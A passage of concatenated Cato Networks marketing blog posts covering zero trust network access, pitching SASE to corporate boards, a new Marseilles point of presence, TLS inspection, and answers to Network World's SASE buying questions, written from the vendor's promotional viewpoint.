Don’t Ruin ZTNA by Planning for the Past Zero trust network access (ZTNA) is an integral part of an enterprise security strategy, as companies move to adopt zero trust security principles and adapt to more distributed IT environments. Legacy solutions such as virtual private networks (VPNs) are ill-suited to the distributed enterprise and do not provide the granular access controls necessary to protect an organization against modern cyber threats. However, not all ZTNA solutions are created equal. In some cases, ZTNA solutions are designed for legacy environments where employees and corporate resources are located on the corporate LAN. Deploying the wrong ZTNA solution can result in tradeoffs between network performance and security. Where ZTNA Can Go Wrong Three of the primary ways in which ZTNA goes wrong are self-hosted solutions, web-only solutions, and solutions only offering agent-based deployments. Self-Hosted Solutions Some ZTNA solutions are designed to be self-hosted or self-managed. An organization can deploy a virtual ZTNA solution on-prem or in the cloud and configure it to manage access to the corporate resources hosted at that location. These self-hosted ZTNA solutions are designed based on a perimeter-focused security model that no longer meets the needs of an organization’s IT assets. Self-hosted ZTNA is best suited to protecting locations where the virtual appliance can be deployed, such as in an on-prem data center or an Infrastructure as a Service (IaaS) cloud service. However, many organizations use a variety of cloud services, including Software as a Service (SaaS) offerings where a self-hosted ZTNA solution cannot be easily deployed. This and the fact that expanding self-hosted ZTNA to support new sites requires additional solutions or inefficient routing, means that these solutions are less usable and offer lower network performance than a cloud-native solution. Web-Only Solutions Often, security programs focus too much on the more visible aspects of an organization’s IT infrastructure. Web security focuses on websites and web apps instead of APIs, and ZTNA is targeted toward the protection of enterprise web apps. However, companies commonly use various non-web applications as well. For example, companies may want to provide access to corporate databases, remote access protocols such as SSH and RDP, virtual desktop infrastructure (VDI), and other applications that do not run over HTTP(S). A ZTNA solution needs to provide support for all apps used by an enterprise. This includes the ability to manage access to both web and non-web enterprise applications. [boxlink link="https://www.catonetworks.com/resources/ztna-demo/?utm_source=blog&utm_medium=top_cta&utm_campaign=ztna_demo"] Secure zero trust access to any user in minutes | ZTNA Demo [/boxlink] Only Agent-Based Deployment Some ZTNA solutions are implemented using agents that are deployed on each user’s endpoint. These agents interact with a self-hosted or cloud-based broker that allows or denies access to corporate resources based on role-based access controls. By using agents, a ZTNA solution can provide a more frictionless experience to users. While an agent-based deployment has its benefits, it may not be a fit for all devices. The shift to remote and hybrid work has driven the expanded adoption of bring your own device (BYOD) policies and the use of mobile devices for work. These devices may not be able to support ZTNA agents, making it more difficult to manage users’ access on these devices. Support for agent-based deployments can be a significant asset for a ZTNA solution. However, implementing ZTNA only via agents deployed on the endpoint can result in some devices being unable to access corporate resources or being forced to use workarounds that could degrade performance or security. Choose the Right ZTNA Solution ZTNA provides a superior alternative to VPNs for secure remote access. However, the success of an organization’s ZTNA deployment can depend on selecting and deploying the right ZTNA solution. Some key requirements to look for when evaluating ZTNA solutions include: Globally Distributed Service: ZTNA solutions that are self-managed and can only be deployed in certain locations create tradeoffs between the performance and security of corporate applications. A ZTNA solution should be responsive everywhere so that employees can easily access corporate resources hosted anywhere, which can only be achieved by a globally distributed, cloud hosted, ZTNA solution. Wide Protocol Support: Many of the most visible applications used by companies are web-based (webmail, cloud-based data storage, etc.). However, other critical applications may use different protocols yet have the same need for strong, integrated access management. A ZTNA solution should offer support for a wide range of network protocols, not just HTTP(S). Agentless Option: Agent-based ZTNA solutions can help to achieve better performing and more secure remote access management; however, they are not suitable for all devices and use cases. A ZTNA solution should offer both agent-based and agentless options for access management. Cato SASE Cloud offers ZTNA as part of an integrated Secure Access Service Edge (SASE) solution. By moving access control and other security and network optimization functions to cloud-based solutions, Cato SASE Cloud ensures that ZTNA services are accessible from anywhere and support a range of protocols. Also, with both agent-based and agentless options, Cato SASE Cloud ensures that all users have the ability to efficiently access corporate resources.

Talking SASE to Your Board: A CIO’s Guide to Getting to ‘Yes’

Introduction: Discussing Transformation with the Board Technology is a strategic requirement for every global organization and its board of directors, regardless of industry. No one is immune from the machinations of technological evolution and the associated disruption that follows. As a result, we can no longer separate business strategy from technology strategy, forcing corporate boards...
Talking SASE to Your Board: A CIO’s Guide to Getting to ‘Yes’ Introduction: Discussing Transformation with the Board Technology is a strategic requirement for every global organization and its board of directors, regardless of industry. No one is immune from the machinations of technological evolution and the associated disruption that follows. As a result, we can no longer separate business strategy from technology strategy, forcing corporate boards to converge their decision-making processes around a strategic agenda of innovation and risk-mitigation. So, CIOs must take an innovative approach when discussing any transformational change with the board. How to Position Network Transformation to the Board Network transformation is a game-changing strategy that helps drive business growth and market acquisition. So, if not positioned effectively to address board-level concerns, it will impact the long-term ability to execute and advance business objectives. When addressing the board, CIOs must position such technology strategies with critical board-level concerns in mind and discuss them in the context of: Can this strategy help us improve IT responsiveness and ability to support business growth? What value will the business realize through this initiative? What is the security impact of this strategy on our critical applications? How would this strategy enable IT organizations to better mitigate increasing security risk? What would be the short- and long-term financial impact of this initiative? What is the impact of our current and next-gen IT talent? Core to discussing these strategies is articulating the necessity of simplification, optimization, and risk-mitigation in delivering business outcomes through network transformation. And this is where Secure Access Service Edge (SASE) becomes that strategic conversation for board-level engagement. [boxlink link="https://www.catonetworks.com/resources/your-first-100-days-as-cio-5-steps-to-success/?utm_source=blog&utm_medium=top_cta&utm_campaign=first_100_days_cio"] Your First 100 Days as CIO: 5 Steps to Success | EBOOK [/boxlink] SASE is the network transformation strategy that addresses board-level concerns around risk, growth, and financial flexibility. SASE converges networking and security capabilities into a single high-performing cloud-native architecture that allows organizations to scale core business operations through efficiency and performance, while extending consistency in policy and protections. So, presenting a SASE strategy to the board requires CIOs to be crisp and clear when highlighting key business benefits. [caption id="attachment_25242" align="alignnone" width="724"] Figure 1[/caption] A Conversational Guide to Engaging the Board on SASE In February 2019, Deloitte defined a 3-dimension conversation model for CIOs when engaging technology boards. This engagement model defines the thought processes of board members when evaluating technology initiatives for sustaining business growth and maximizing balance sheets. [caption id="attachment_25244" align="alignnone" width="724"] Figure 2[/caption] To influence the board’s decision-making process, CIOs can lean on this model to guide their discussion of SASE’s positive impact on business growth and sustainability. While SASE may not speak specifically to each sub-dimension of the Deloitte model, the core focus on Strategy, Risk and Financial Performance can be adapted as a conversation guide when discussing SASE and Network Transformation. Highlight the Strategic Value of SASE Disruptive technology drives business growth and market share acquisition. However, CIOs should emphasize SASE not as a disruptive technology, rather as a disruptive approach to existing technologies. When positioning SASE to boards, CIOs should emphasize the strategic potential of SASE’s disruptive approach to simplifying network operations, which by extension, accelerates business growth. CIOs must articulate the strategic business benefits of converging networking and security functions into a single cloud-native software stack with unlimited scalability to support business growth. An obvious benefit is how SASE accelerates and optimizes access to critical applications, enhancing the collection, analysis, and securing of data, while improving user experiences and efficiency. Another benefit is how SASE eliminates scaling challenges when more capacity is required to service business growth and expansion. An imperative for CIOs is to highlight use cases where SASE proves its strategic value across the entire enterprise. Successful SASE implementations makes it easier to pursue Cloud Migration, Work-From-Home (WFH), UCaaS, and Global Expansion projects, just to name a few. Through these, we observe how SASE not only eliminates networking and security headaches, but it also streamlines the efforts of IT teams, allowing them to place more focus on these strategic initiatives. SASE has now become that true platform for digital transformation and an enabler of business growth. In short, CIOs must emphasize how SASE enables the network to scale at the speed of business, instead of the business being limited by the rigid, inflexibility of the network. This approach allows CIOs to demonstrate SASE’s strategic value to the overall business by removing technical challenges that limit growth. Conversation Tips SASE as a disruptive approach to simplifying network operations SASE as a “Growth Enabler” – optimized access improves business operations Unlimited scalability at the speed of business [caption id="attachment_25250" align="alignnone" width="724"] Figure 3[/caption] Present the Risk-mitigation Value of SASE No one is immune to cyber risk, and boards will naturally question cyber readiness for critical projects that support business growth. Typically, discussions around risk are fragmented along network support for new initiatives, and security risk to data and privacy. This overlooks the obvious linkage between the two, but SASE allows CIOs to blend these conversations to address critical board-level concerns. Considering this, presenting the risk-mitigation value of SASE requires CIOs to address a key imperative of most boards – SASE must help overcome increased complexity and mitigate cyber risks today and well into the future. Years of acquiring point products to solve point problems have bloated technology environments, resulting in security blind spots, increased complexity, and unmanageable risk. SASE proves its risk mitigation value by simplifying protection schemes, increasing visibility, improving threat detection and response, unifying security policies, and facilitating easier auditing. CIOs must also emphasize SASE’s simplistic Zero-Trust access approach to critical applications, delivering consistent policy enforcement across the entire network. Finally, CIO’s must outline how SASE enable organizations to meet regulatory and compliance mandates and policies. This conversational approach re-enforces SASE’s risk-mitigation value and alleviates one of the biggest board-level concerns – the risk of ransomware and business disruption. Conversation Tips Highlight cyber risks without SASE –complexity, blind spots, and reputation loss Risk Mitigation value – holistic data protection schemes True SASE is a platform that enables compliance mandates [caption id="attachment_25252" align="alignnone" width="724"] Figure 4[/caption] Discuss SASE as a Financial Performance Enabler Boards are laser-focused on the long-term financial performance goals of the business. The board needs to understand how network transformation will improve their balance sheets and customer retention. While many CIOs hesitate to link technology investments to financial performance metrics, articulating the positive impact of SASE on financial performance can position it as an ROI-enabler. In our whitepaper, “ROI of Doing Nothing”, we highlight the long-term financial impact of delaying network transformation with SASE. Becoming a Stage 1 company – transition early to anticipate challenges vs. being a Stage 2 company – delay results in increased requirements and subsequent costs, comes down to the overall financial burden organizations are prepared to withstand. CIOs must promote the positive ROI of SASE in securing the long-term financial structure of the business. When evaluating the feasibility of network transformation with SASE, CIOs must speak to the business and talent efficiencies to be gained. Today, most enterprises exhaust considerable resources running and maintaining inefficient infrastructures. This often produces outages across the network, which impacts operations across the entire business. The financial impact of this is not only measured in maintenance contracts and renewal/upgrade fees, but also in application availability, performance, and scalability. SASE reduces costs by retiring expensive and inefficient systems, and this also directly impacts their IT talent performance. Similar to the strategic value, less time spent on mundane technical support activities enables IT teams to direct their support efforts towards strategic, revenue-generating initiatives. This increases revenue generated per-head, thus improving the operational cost model. Highlighting key performance metrics related to revenue and ROI will gain broad consensus for SASE projects. Mapping key performance requirements into business ROI gained via SASE, demonstrates how it not only transforms networking and security, but also overall IT and business operations that impact the bottom-line. Conversation Tips SASE as an ROI enabler – lower TCO Delaying SASE – impacts long-term cost structures IT support for revenue-generating initiatives [caption id="attachment_25254" align="alignnone" width="724"] Figure 5[/caption] A SASE Engagement Model Allows for CIO-Board Partnership Justifying network transformation can be challenging considering it requires a paradigm shift towards a new way of viewing IT operations and its impact on the broader business. By following a simple board-level engagement model focusing on Strategy, Risk and Performance, CIOs can build a more compelling discussion on the numerous advantages in SASE that extend far beyond simple network and security efficiencies. It is important to develop that CIO-Board partnership that explores these through a business outcome lens. SASE pursued with strategic business enablement in mind alleviates the key board-level concerns, while empowering CIOs to deliver the resilient, cost-effective converged platform that enables optimal IT operations, mitigates risk, and produces long-term ROI. Engaging the board on new technology approaches such as SASE does not have to be scary. SASE provides a new way to envision the Digital Infrastructure of the Future, and highlighting the main concerns of most board members, is the most direct approach to discuss this topic. This writing provides a simple guide for mapping board-level concerns to the intrinsic advantages of SASE, while providing a roadmap to realizing the key benefits. To learn more about how CIO’s succeed in this digital era, download our “First 100 Days as a CIO” guide.

Cato Expands to Marseilles and Improves Resiliency Within France

Cato just announced the opening of our new PoP in Marseilles, France. Marseilles is our second PoP in France (Paris being the first) and our 20th in EMEA. Overall, Cato SASE Cloud is comprised of 70+ PoPs worldwide, bringing Cato’s capabilities to more than 150 countries. As with all our PoPs, Marseilles isn’t just a...
Cato Expands to Marseilles and Improves Resiliency Within France Cato just announced the opening of our new PoP in Marseilles, France. Marseilles is our second PoP in France (Paris being the first) and our 20th in EMEA. Overall, Cato SASE Cloud is comprised of 70+ PoPs worldwide, bringing Cato’s capabilities to more than 150 countries. As with all our PoPs, Marseilles isn’t just a “gateway” that secures traffic to and from the Internet. Cato PoPs are far more powerful. Like the rest of our PoPs, Marseilles will run Cato's Single Pass Cloud Engine (SPACE), Cato's converged cloud-native software. Cato SPACE provides enterprise-grade threat prevention, data protection, and global traffic optimization for East-West traffic to other Cato PoPs and North-South traffic to the Internet or the cloud. Cato SPACE sets speed records in the SASE world by processing up to 3 Gbps of traffic per site with full decryption and all security engines active at line rate. Cato SPACE is so effective and reliable, that enterprises can replace legacy MPLS networks and security appliances. The Marseilles PoP, like all of our PoPs, is equipped with multiple compute nodes running many SPACE engines. When a site’s traffic hits the Marseilles PoP, the traffic flow is immediately assigned to the most available SPACE engine. Should a SPACE engine fail within a PoP, flows are automatically processed by another SPACE instance. Should the datacenter hosting a Cato PoP fail, users and resources automatically reconnect to the next available PoP as all PoPs are equipped with enough surplus capacity to accommodate the additional load. [boxlink link="https://www.catonetworks.com/news/cato-networks-strengthens-sase-presence-in-france-with-new-point-of-presence-pop-in-marseilles/?utm_source=blog&utm_medium=top_cta&utm_campaign=marseilles_pop_pr"] Cato Networks Strengthens SASE Presence in France with New Point of Presence (PoP) in Marseilles | News Release [/boxlink] A case in point was the recent Interxion datacenter outage. The datacenter housed the London Metal Exchange and Cato's London PoP. The outage disrupted the Exchange for nearly five hours. Cato customers were also impacted – for 30 seconds – as London-connected sites, and users automatically and transparently moved over to Cato's Manchester and Dublin PoPs. In the case of Marseilles, Cato's self-healing architecture automatically and transparently moves sites and users to the next best PoP, likely the one in Paris. "Before Cato, there were outages, complaints, and negative feedback from several internal teams about the service from our major international MPLS provider," said Thomas Chejfec, Group CIO of Haulotte, a global manufacturer of materials and people lifting equipment. Haulotte moved to Cato after facing three years of delays and cost overruns, rolling out MPLS to its more than 30 offices across Western Europe, North America, South America, Africa, and Asia Pacific. "Since deploying Cato, the network is no longer a topic of discussion with users," says Chejfec. "We never hear about it anymore." Of course, delivering a great cloud platform means having great partners. Cato's complete range of networking and security capabilities are available today from numerous partners across France, including Ava6, ADVENS, Anetys, Hexanet, IMS Networks, OCD, NEOVAD, Nomios, Rampar, Sasety, and Selceon. Cato continues to work hard to deliver and grow our global network. Marseilles is our latest launch, but hardly our last. Expect us to continue adding PoPs and growing our global footprint so you can connect and secure your offices and users wherever they may be located.

Don’t Turn a Blind Eye to TLS Traffic

TLS or Transport Layer Security is the evolution of SSL, and the terms are often used interchangeably. TLS is designed to increase security by encrypting data end-to-end between two points, ideally preventing bad actors from having visibility into the traffic of your web session. However, threat actors have also come to see the value in...
Don’t Turn a Blind Eye to TLS Traffic TLS or Transport Layer Security is the evolution of SSL, and the terms are often used interchangeably. TLS is designed to increase security by encrypting data end-to-end between two points, ideally preventing bad actors from having visibility into the traffic of your web session. However, threat actors have also come to see the value in utilizing TLS encryption for delivering malware and evading security controls. This can be indirect via the leveraging common sanctioned SaaS applications (Office365, Box, Dropbox, GDrive, etc.) as delivery vectors or direct by using free certificates from Let’s Encrypt. Let’s Encrypt is a free and open certificate authority created and run for the benefit of the public. Despite being designed for good, threat actors wasted no time in leveraging the advantages of free encryption in their activities. The point here is that most traffic, good and bad, is now TLS encrypted and can create challenges for IT and security teams. TLS Inspection to the Rescue TLS inspection is almost completely transparent to the end-user and sits between the user and their web applications. Like the malicious activity known as a man-in-the-middle attack, TLS inspection intercepts the traffic, enabling inspection by security engines. For this to work without disruption to the end-user, an appropriate certificate must be installed on the client device. TLS inspection has been available for some time now but isn’t widely used due to a variety of reasons, primarily cost and complexity. Historically NGFW or other appliances have been the source of TLS inspection capabilities for organizations. With any appliance, there is a fixed amount of capability, and the more features you enable, the lower the throughput. TLS inspection is no different and often requires double (or more) hardware investment to accomplish at scale. Additionally, TLS inspection brings up privacy concerns about financial and health information that are not always easily addressed by legacy products. [boxlink link="https://www.catonetworks.com/resources/tls-decryption-demo/?utm_source=blog&utm_medium=top_cta&utm_campaign=tls_demo"] Cato Demo | TLS Inspection in Minutes [/boxlink] SASE Makes it Possible SASE or Secure Access Service Edge removes most of the challenges around TLS decryption, allowing organizations to secure their users and locations more effectively. SASE offers TLS inspection capabilities as product functionality, with no need to size and deploy hardware. Simply create desired exceptions (or alternatively specify what traffic to inspect), deploy certificates to endpoints, and enable the feature. This easy alternative to NGFW TLS decryption makes it possible for organizations to gain visibility into the 95% of their traffic that is hiding in TLS. There are still some challenges, primarily certificate pinned websites and applications. Most SASE providers will manage a bypass list of these for you, but you can always improve your security posture by blocking un-inspectable traffic where it makes sense. Gain Visibility Today The question remains, if you are not inspecting TLS today, why aren’t you? You have most likely invested in security technologies such as IPS, CASB, SWG, Next-Generation Antimalware, DLP, etc., but without complete visibility, these tools cannot work effectively. Security engines are a bit like the x-ray machine at airport security, they reveal the contents of luggage (packets) to identify anything bad. Now imagine if you are in the security line and they are only inspecting 5 out of every 100 bags. How secure does this make you feel, would you still get on the plane? SASE has removed many of the obstacles to adopting TLS inspection and provides complete visibility to all security engines to maximize their value. If you have not considered SASE yet, now may be the time. If you already have SASE and do not know where to start with TLS inspection, start small. You should be able to selectively enable the capability for risky categories of URLs and applications and then increase the scope as your comfort level grows. See this quick video demo on how easy it is to enable TLS inspection with Cato Networks!

Planning for the Distributed Enterprise of the Future

In the past, most of an organization’s employee and IT resources were located on the enterprise LAN. As a result, enterprise security models were focused on defending the perimeter of the corporate network against external threats. However, the face of the modern enterprise is changing rapidly. Both users and IT resources are moving off of...
Planning for the Distributed Enterprise of the Future In the past, most of an organization’s employee and IT resources were located on the enterprise LAN. As a result, enterprise security models were focused on defending the perimeter of the corporate network against external threats. However, the face of the modern enterprise is changing rapidly. Both users and IT resources are moving off of the corporate LAN, creating new employee and service network edges. Distributed Employee Edges The most visible sign of the evolution of the modern enterprise is the growing acceptance of remote work. Employees working remotely is nothing new, even for organizations without formal telework programs. Business travel, corporate smartphones, and other factors have led to corporate data and resources being accessed from outside the enterprise network, often without proper support or security. The pandemic normalized remote work as businesses found that their employees could effectively work from basically anywhere. In fact, many businesses found that remote work increased productivity and decreased overhead. As a result, many businesses plan to support at least hybrid work indefinitely, and telework has become a common incentive for hiring and retaining employees. Scattered Service Locations While the rapid growth and distribution of employee edges can be attributed to the pandemic, service edges have been expanding for years. The emergence of cloud-based data storage and application hosting has transformed how many organizations do business. The cloud provides numerous benefits, but one of its major selling points is the wide range of service options that organizations can take advantage of. Companies can move enterprise data to a cloud data center, outsource infrastructure management to a third-party provider for hosted applications, or take advantage of Software as a Service (SaaS) applications that are developed and hosted by their cloud service provider. Nearly all organizations use at least some cloud services, even if this is simply cloud-based email and data storage (G-Suite, Microsoft 365, etc.). However, many companies have not completely given up their on-prem infrastructure, hosting some data and applications locally to meet business needs or regulatory compliance requirements. This mix of on-prem and cloud-based infrastructure complicates the corporate WAN. Both on-site and remote workers need high-performance, reliable, and secure access to corporate data and applications, regardless of where the user and application are located. [boxlink link="https://www.catonetworks.com/resources/how-three-enterprises-delivered-remote-access-everywhere/?utm_source=blog&utm_medium=top_cta&utm_campaign=3_enterprises_delivered_remote_access"] How Three Enterprises Delivered Remote Access Everywhere | EBOOK [/boxlink] Legacy Infrastructure Doesn’t Meet Modern Needs Many organizations’ security models were designed for the era where employees and corporate IT assets were centralized on the corporate LAN. By deploying security solutions at the perimeter of the corporate network, organizations attempt to detect inbound threats and outbound data exfiltration before they pose a threat to the organization. The perimeter-focused security model has many shortcomings, but one of the most significant is that it is designed for an IT infrastructure that no longer exists. With the expansion of telework and cloud computing, a growing percentage of an organization’s IT assets are now located outside the protected perimeter of the corporate LAN. A major challenge that companies face when adapting to the growing distribution of their IT assets is that many of the tools that they are trying to use to do so are designed for the same outdated model. For example, virtual private networks (VPNs) were designed to provide point-to-point secure connectivity, such as between a remote worker and the enterprise network. This design doesn’t work when employees need secure access to resources hosted in various places (on-prem, cloud, etc.) Trying to support a distributed workforce with legacy solutions creates significant challenges for an organization. VPNs’ design and lack of built-in security and access control result in companies routing all traffic through the corporate network for inspection, resulting in increased latency and degraded performance. It also creates challenges for IT personnel, who need to deploy and maintain complex and inflexible VPN-based corporate WANs. ZTNA Enables Usable, Scalable Security As companies’ workforces and infrastructure become more distributed, attempting to make the corporate WAN work with legacy solutions is not a sustainable long-term plan. A switch away from perimeter-focused technologies like VPNs is essential to the performance, reliability, and security of the enterprise network. Zero trust network access (ZTNA) offers a superior alternative to VPNs that is better suited to the needs of the distributed enterprise of the future. Some advantages of a cloud-based ZTNA deployment include: Global Accessibility: ZTNA can be hosted in the cloud, making it globally accessible. Once access decisions are made, traffic can be routed directly to its destination without a detour through the corporate network. Granular Access Controls: VPNs are designed to provide legitimate users with unrestricted access to corporate resources. ZTNA provides access to a specific resource on a case-by-case basis, enabling more granular access management and better enforcement of least privilege. Centralized Management: A VPN-based WAN for an organization with multiple sites and cloud-based infrastructure requires many independent links between different sites. ZTNA does not require these independent tunnels and can be centrally monitored and managed, simplifying network and security configuration and management. Private Backbone: Cato’s ZTNA uses a private backbone to route traffic between sites. This improves the performance and reliability of network traffic beyond what is possible with the public Internet. Solutions like VPNs are designed for an IT architecture that no longer exists and never will again. As companies adopt cloud computing and remote work they need infrastructure and security solutions designed for a distributed IT architecture. By deploying ZTNA with Cato, companies can improve network performance and security while simplifying management.

Overcoming ZTNA Deployment Challenges with the Right Solution

Zero-trust network access (ZTNA) is a superior remote access solution compared to virtual private networks (VPNs) and other legacy tools. However, many organizations are still relying on insecure and non-performant solutions rather than making the switch to ZTNA. Why You Might Not Be Using ZTNA (But Should Be) Often, companies have legitimate reasons for not...
Overcoming ZTNA Deployment Challenges with the Right Solution Zero-trust network access (ZTNA) is a superior remote access solution compared to virtual private networks (VPNs) and other legacy tools. However, many organizations are still relying on insecure and non-performant solutions rather than making the switch to ZTNA. Why You Might Not Be Using ZTNA (But Should Be) Often, companies have legitimate reasons for not adopting ZTNA - and below we take a closer look at some of the most common concerns: “A VPN is Good Enough” One of the simplest reasons why an organization may not want to upgrade their VPN to ZTNA is that they’ve always used a VPN and it has worked for them. If remote users can connect to the resources that they need, then it may be difficult to make a compelling case for a switch. However, even if an organization’s VPN infrastructure is performing well, there is still security to consider. A VPN is designed to provide a remote user with unrestricted, private access to the corporate network. This means that VPNs lack application-level access controls and integrated security. For this reason, cybercriminals commonly target VPNs because a single set of compromised credentials can provide all of the access needed for a data breach, ransomware infection, or other attacks. In contrast, ZTNA provides access on a case-by-case basis decided based on user and application-level access controls. If an attacker compromises a user’s account, then their access and the damage that they can do is limited by that user’s permissions. “ZTNA is Hard to Deploy” Deploying a new security solution can be a headache for an organization’s security team. They need to integrate it into an organization’s existing architecture, design a deployment process that limits business disruption, and perform ongoing configuration and testing to ensure that the solution works as designed. When an organization has a working VPN solution, then the overhead associated with switching to ZTNA may not seem worth the effort. While installing ZTNA as a standalone solution may be complex, deploying it as part of a Secure Access Service Edge (SASE) solution can streamline the process. With a managed SASE solution, deployment only requires pointing infrastructure to the nearest SASE point of presence (PoP) and implementing the required access controls. [boxlink link="https://www.catonetworks.com/resources/ztna-demo/?utm_source=blog&utm_medium=top_cta&utm_campaign=ztna_demo"] Secure zero trust access to any user in minutes | ZTNA Demo [/boxlink] “VPNs are Required for Compliance” Most companies are subject to various data protection and industry regulations. Often, these regulations mandate that an organization have certain security controls in place and may recommend particular solutions. For secure remote access, VPNs are commonly on the list of acceptable solutions due to their age and widespread adoption. However, regulations are changing rapidly, and the limitations of VPNs are well known. As regulators start looking for and mandating a zero-trust approach to security within organizations, solutions like VPNs, which are not designed for zero trust, will be phased out of regulatory guidance. While regulations still allow VPNs, many also either explicitly recommend ZTNA or allow alternative solutions that implement the required security controls. ZTNA provides all of the same functionality as VPNs but also offers integrated access control. When deployed as part of a SASE solution, ZTNA is an even better fit for regulatory requirements due to its integration with other required security controls and adoption of a least privileges methodology commonly required by regulatory frameworks such as UK NCSC Cyber Essentials and NIST. For organizations looking to achieve and maintain compliance with applicable regulations, making the move to ZTNA as soon as possible will decrease the cost and effort of doing so. “We’ve Already Invested in Our VPN Infrastructure” VPNs have been around for a while, so many organizations have existing VPN deployments. When the pandemic drove a move to remote work, the need to deploy remote work solutions as quickly as possible led many organizations to expand their existing VPN infrastructure rather than investigate alternatives. As a result, many organizations have invested in a solution that, to a certain degree, meets their remote work needs. These sunk costs can make ripping out and upgrading VPN infrastructure an unattractive proposition. However, the differential in functionality between a VPN and a ZTNA solution can far outweigh these costs. ZTNA provides integrated access management, which can reduce the cost of a data breach and simplify an organization’s regulatory compliance strategy. A ZTNA solution that successfully prevents a data breach by blocking unauthorized access to sensitive data may have just paid for itself. “Our Security Team is Already Overwhelmed with Our Existing Solutions” Many organizations’ security teams are struggling to keep up. The cybersecurity skills gap means that companies are having trouble finding and retaining the skilled personnel that they need, and a sprawling array of security solutions creates overwhelming volumes of alerts and the need to configure, monitor, and manage various standalone solutions. As a result, the thought of deploying, configuring, and learning to use yet another solution may seem less than appealing. Yet one of the main advantages of ZTNA is that it simplifies security monitoring and management, especially when deployed as part of a SASE solution. By integrating multiple security functions into a single network-level solution, SASE eliminates redundant solutions and enables security monitoring and management to be performed from a single console. By reducing the number of dashboards and alerts that analysts need to handle, SASE reduces the burden on security teams, enabling them to better keep up with an accelerating threat landscape and expanding corporate IT infrastructure. ZTNA is the Future of Remote Access Many organizations have solutions that - on paper - provide the features and functionality that they need to support a remote workforce and provide secure access to corporate applications. However, legacy solutions like VPNs lack critical access controls and security features that leave an organization vulnerable to attack. As the zero trust security model continues to gain momentum and is incorporated into regulations, organizations will need solutions that meet their security needs and regulatory requirements. ZTNA meets these needs, especially as part of a SASE solution.

How to Buy SASE: Cato Answers Network World’s 18 Essential Questions

Last December, Network World published a thoughtful guide outlining the questions IT organizations should be asking when evaluating SASE platforms. It was an essential list that should be included in any SASE evaluation. Too often, SASE is a marketing term applied to legacy point solutions, which is why we suspect these questions are even needed....
How to Buy SASE: Cato Answers Network World’s 18 Essential Questions Last December, Network World published a thoughtful guide outlining the questions IT organizations should be asking when evaluating SASE platforms. It was an essential list that should be included in any SASE evaluation. Too often, SASE is a marketing term applied to legacy point solutions, which is why we suspect these questions are even needed. By contrast, The Cato SASE Cloud is the world's first cloud-native SASE platform, converging SD-WAN and network security in the cloud. Cato Cloud connects all enterprise network resources including branch locations, the mobile workforce, and physical and cloud data centers, into a global and secure, cloud-native network service. With all WAN and Internet traffic consolidated in the cloud, Cato applies a suite of security services to protect all traffic at all times.  In short, Cato provides all of the core SASE capabilities identified by NWW. We are pleased to respond point-by-point to every issue raised. You should also check out our SASE RFP template to help with the valuation. 1. Does the vendor offer all of the capabilities that are included in the definition of SASE? If not, where are the gaps? If the vendor does claim to offer all of the features, what are the strengths and weaknesses? How does the maturity of the vendor offerings mesh or clash with your own strengths, weaknesses, and priorities? In other words, if your biggest need is Zero Trust, and the vendor's strength is SD-WAN, then the fit might not be right. Yes, Cato provides all of the core capabilities NWW defines for SASE – and more. On the networking side, the Cato Global Private backbone connects 70+ PoPs worldwide. Locations automatically connect to the nearest PoP with our edge SD-WAN device, the Cato Socket. Cloud datacenters are connected via an agentless configuration, and cloud applications are connected through our cloud-optimized routing. Remote users connect in by using the Cato Mobile Client or clientless browser access.On the security side, Cato Security as a Service is a fully managed suite of enterprise-grade and agile network security capabilities, directly built into the Cato Global Private Backbone. Current security services include firewall-as-a-Service (FWaaS), secure web gateway with URL filtering (SWG), standard and next-generation anti-malware (NGAM), IPS-as-a-Service (IPS), and Cloud Access Security Broker (CASB), and a Managed Threat Detection and Response (MDR) service. 2. How well integrated are the multiple components that make up the SASE? Is the integration seamless? The Cato SASE Cloud is completely converged. The Cato SPACE architecture is a single software stack running in our PoPs. Enterprises manage and monitor networking, security, and access through a single application. All capabilities are available in context via a shared user interface. Objects created in one domain (such as security) are available in other domains (such as networking or remote access). (To see what we mean by seamless, check out this detailed walkthrough of the Cato Management Application.) [boxlink link="https://www.catonetworks.com/resources/5-questions-to-ask-your-sase-provider/?utm_source=blog&utm_medium=top_cta&utm_campaign=5_questions_for_sase_provider"] 5 Questions to Ask Your SASE Provider | eBook [/boxlink] 3. Assuming the vendor is still building out its SASE, what does the vendor roadmap look like? What is the vendor's approach in terms of building capabilities internally or through acquisition? What is the vendor's track record integrating past acquisitions? If building internally, what is the vendor's track record of hitting its product release deadlines? Cato has demonstrated its ability to develop and bring capabilities to market. Since its founding in 2015, Cato has successfully developed and delivered the global SASE cloud, which is used today by more than 1000 enterprises. We regularly add new services and capabilities to our platform, such as December's announcement of more than 103 frontend improvements and updates to our backend event architecture. (Other additions included a Cloud Application catalog, a Threats dashboard, an Application Analytics dashboard, CASB launch, and updates to our managed detection and response (MDR) service that automated security assessments.) 4. Whose cloud is it anyway? Does the vendor have its own global cloud, or are they partnering with someone? If so, how does that relationship work in terms of accountability, management, SLAs, troubleshooting? Cato owns and maintains the Cato SASE Cloud. The PoPs are on our hardware hosted in tier-3 datacenters, running Cato's cloud-native software stack. Every PoP is connected by at least two and many by four tier-1 carriers, who provide SLA-backed capacity. Cato's custom routing software constantly evaluates these paths identifying the shortest path for each packet. Question for MSPs Network World also included a series of questions specific to managed service providers (MSPs) that we'd like to address as well. Cato in addition to building a SASE platform is also a service provider so we took the liberty of responding to these questions as well. 1. How many PoPs do they have and where are they located? Does the vendor cloud footprint align with the location of your branch offices? The Cato Global Private backbone currently serves 140 countries worldwide from more than 70 PoPs that we continue to expand each quarter. 2. Does the vendor have the scale, bandwidth, and technical know-how to deliver line-rate traffic inspection? Thanks to our highly scalable cloud-native architectures, the Cato Cloud delivers line-rate performance regardless of whether traffic is encrypted or unencrypted or the number of security operations performed. PoPs have enough spare capacity to accommodate traffic surges. Case in point was how our Manchester PoP accommodated additional traffic during the Interxion outage. 3. For the cloud-native vendors: How can you demonstrate that your homegrown SASE tools stack up against, say, the firewall functionality from a name-brand firewall vendor? Cato can fully replace branch office firewalls and, usually, datacenter firewalls. Moreover, the convergence of capabilities allows us to deliver security capabilities and visibility impossible with legacy point solutions. For example, we can use data science and machine learning algorithms on networking data to spot security threats before they can exfiltrate data. The company was founded by security luminary Shlomo Kramer, co-founder of Checkpoint Software. It taps some of the brightest minds in cybersecurity that Israel has to offer. You're welcome to try out our platform and see for yourself. 4. Is there a risk that the vendor might be an acquisition target? As the market continues to heat up, further acquisitions seem likely, with the bigger players possibly gobbling up the cloud-native newcomers. Cato is a well-established company with well over 1,100 enterprise customers committed to serving the needs of those customers for the long term. We've 